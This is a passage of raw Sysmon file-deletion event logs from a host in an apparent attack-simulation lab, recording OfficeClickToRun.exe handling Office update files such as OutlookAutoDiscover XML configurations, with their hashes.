Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PAGESIZE\PGLBL001.XMLMD5=544F502153A5BB91A33ECA3DD1A19B59,SHA256=63DD6C1407D0A9AEC3A814DD54884AD25F0EBF732E1C0C6C14AE9CAD7534C56A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookReactNative\SearchView\NOTICE.txtMD5=0AD1A98FC333722F2179EA0544B31FE4,SHA256=CDB42A03BB14DCFEB6662D9A6371D16ABB21D18E66994EC42BEB39BFA15C79D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookReactNative\SearchView\index.win32.bundleMD5=AA30127719B706CEE6486582C89C0BDB,SHA256=D8393A02F9BD660C95ECC6EB24AF0C4402A5F1ABD1E8B5A1FC7716FCE6D75EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.SE.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.PL.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.NO.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.JP.XMLMD5=B1D44BF4BE3B12C5DC81CCF412559323,SHA256=342480031F95D081B1F70E803F58D5BD351DDC8EF5311D4B0B93CEE0C38CF963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.IT.XMLMD5=B396C6616C701DB76AE34037BFF88274,SHA256=7A67400D2CAFBB3906D9E4D43E9F2DC56CACCEEC668C1FFF3232AE06EDDBD2A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.IE.XMLMD5=4AC759A0010213C0DAE4AD7E6B954AC8,SHA256=3604443B58BDCBED2EF73FC449B0B53064FBB084C005E2FDBED7C9432F543BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.HK.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.FR.XMLMD5=4C94B28355D47465D0261400D01C2D38,SHA256=D2BC826AA84A40AF2A3C563D384C39EC672CD055EB9016F1FC6676B0831C5458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.ES.XMLMD5=B9CE1AAAC75D784C03763858648A8689,SHA256=0DDC9E6D83FFAD5D7CC5AADBFE33F12241285034937F7B1258D30AC1AD3392AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.DE.XMLMD5=6AE5357AE96F663ED58AEE772B0A71D1,SHA256=C07E81C5581A4A2CC812277B0A2D1A06072BC0EC74CCD2B8A8C35A14F568D0B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.VN.XMLMD5=28B364C3E536127315B00D28D582BC79,SHA256=9BD2820E091647AD56766F142D905F8869B27E9FE3AA25036D70BE807E681CB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.TW.XMLMD5=2FE0D0003A0ABB13D2BDFE250DAC3694,SHA256=E51B82BDFE6BB2A251BE98F0C4053BBE029E5E5A19222D862E03E05800D4BCAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.SG.XMLMD5=562AFD4E5B71F349A7BD77D9455673FA,SHA256=ED152BF16B4FE10233D71169EF5805E021678413BFA6FCF69BC6C6798B168D94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.PH.XMLMD5=05E8BA534942D93BEACC7FA204497D9F,SHA256=B468A5040319551BF0B0848D0C03A59CA2189AEC914FED4939FC7EE00A9D626A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.MY.XMLMD5=D2E73CF91A05AB5130B704FB99967315,SHA256=4B1302C1CE8180518EB66A4BA4052571942F9C75F9F2D1998DC371F6AB33E9CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.MX.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.HK.XMLMD5=C6B25D8EEDAEC73648D084C45E2451C6,SHA256=3A1CB0F689B79BBFBBB6C29870623B2306E449A5B2C050C1B33BE9D6FC201FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.CN.XMLMD5=63D4A31E8ED0A74BE917F8FB115A8096,SHA256=C53291FBBF48944DF71A1ED49D7B6CCE90F2F80CB7A2E38702FCDE456515DB3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.BR.XMLMD5=5B8D838A12C6443CB8235264B8258C5D,SHA256=F9D50ED83F6691535590CF8A29729EC18C6C737B04E084DA574F681C8C935F26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.AU.XMLMD5=460204377C86C8BF37FA59E336831AAB,SHA256=F71B9D7F00FCB1871BE35C7E984F0C946AC6E75946DC4800F231659FADBC0527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.COM.AR.XMLMD5=C5F52824779E014FCA9B6E5BCCDD7748,SHA256=4DBB7476B3CA07B69528355422387A5C638471CF1A9AA890344DD6C5B1D607D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.UK.XMLMD5=4AC759A0010213C0DAE4AD7E6B954AC8,SHA256=3604443B58BDCBED2EF73FC449B0B53064FBB084C005E2FDBED7C9432F543BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.TH.XMLMD5=C97F325596B9B1D1AD51B1E82A01548A,SHA256=DCB2C3FF0B84D025FEBD9E5B166F35ADF13B457138928C4C08E16A9AE4CB528B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.NZ.XMLMD5=460204377C86C8BF37FA59E336831AAB,SHA256=F71B9D7F00FCB1871BE35C7E984F0C946AC6E75946DC4800F231659FADBC0527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.KR.XMLMD5=FC9A01384283F760B245BAFDE02893CA,SHA256=7BDB5BE38475510A7C05A3444B122A62E8CF4C05B35E656CA4DECCCE4A55D968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.JP.XMLMD5=F0F1F60CC29525DDFBFD402381E0E42B,SHA256=1A5E7B2B72CE5096B08F1B78CF2906F13098AA35257C6CFD69BD077A9983AC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.IN.XMLMD5=4B6D837FDBA1FE5306CC2C0DC630E4AF,SHA256=171D526D78A4AFC93738F60881B6F05726F59CF992A57718122863E766CCD169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CO.ID.XMLMD5=2D8E27619A4D15BCA2A2B04ADB8C4FE5,SHA256=CE4C5FFD3E2F77FCEC8F782962B6770050CB8476F71242EF178D0562069B5843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\YAHOO.CA.XMLMD5=2A2E2872F1539413D295BBD853BFE85A,SHA256=0A990E1A0A5D939A2017CF956CB61477DC7682F7F36805651CD830D884BFFBC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\WANS.NET.XMLMD5=48348A555BD85B4B1CF3584A5A75F185,SHA256=83D385170A47A8ACE4D43944A9C7529F273F5523BB074AAA941DBD2BAF33DBE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\TALK21.COM.XMLMD5=F7120202954B5559DF4E0C9BCD7B7B16,SHA256=C5CD6124B33DA659724837C3B83B5A54C027B5C9719D1E6AF2E778C9811E1DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\SWBELL.NET.XMLMD5=C306FBF279B5DA3857EDEC138FF5B0F3,SHA256=EF213DFA026F3CF024FB6A7D4277AB28D7BD4F4CEF59683D4EEA2271547754B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\SNET.NET.XMLMD5=F7710CE421BBF817CEDC3A6FD1701A57,SHA256=7F4EDC269D984BB5ED6A93B7BEAA266C92B6E197DAA785B241CCFC0CF31023E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\SBCGLOBAL.NET.XMLMD5=04145F8F0B2C7D65DB4C99D720784AA1,SHA256=9A91428EF84D31A5672AC60F1197D691E258963E4C8FDDC1EC78E6BF1246942C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\ROGERS.COM.XMLMD5=76679725571122B0BB69B3CAA7258C28,SHA256=79F89A7FC54D36847A2355A5346922803749E460AB5C26CF3381A3460DF5132A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\PRODIGY.NET.XMLMD5=270E3DD19E197C61433CE57528228051,SHA256=D2D1E799D95DB4E1BA43A466C4029CD1FBA8F586AD8A8A845C5B6F1B2BBFB0C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\PACBELL.NET.XMLMD5=EE9E1890F7EC7AAF5E466BA46ABFAD68,SHA256=9B6C9C9E1FA04B32463E06331A7F47086BDB13B8C8AEDC529EEBCA7B92C7D242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\NVBELL.NET.XMLMD5=24EB0BB361A99D3BDC8D37E9DE1D7926,SHA256=DEC02846EF9C8BDD108A65C9919F6985347AC63412538F4139DA178CC13A7916,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\NL.ROGERS.COM.XMLMD5=76679725571122B0BB69B3CAA7258C28,SHA256=79F89A7FC54D36847A2355A5346922803749E460AB5C26CF3381A3460DF5132A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\GMAIL.COM.XMLMD5=C0493ED3247FCCD51493A968D71ABD0C,SHA256=35E0CFC556050512C8E19D81C9BCA29E85623135C2D97DB0072BF4734DA48265,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 